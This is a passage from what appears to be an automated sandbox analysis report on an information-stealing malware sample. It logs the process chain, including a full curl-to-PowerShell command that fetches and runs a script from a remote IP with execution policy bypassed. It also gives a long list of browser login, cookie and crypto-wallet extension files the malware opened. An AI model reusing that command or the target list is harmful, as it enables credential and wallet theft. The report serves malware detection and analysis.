                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004E0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: deafeninggeh.biz
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004E0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: immureprech.biz
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA2B.tmp" "c:\Users\user\AppData\Local\Temp\cqvy0dal\CSC988509BDD3DA4C1893528181DB7478.TMP"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: RegAsm.exe, 00000007.00000002.4207908968.0000000000E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4103780633.00000000058D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.dbJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.jsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqliteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
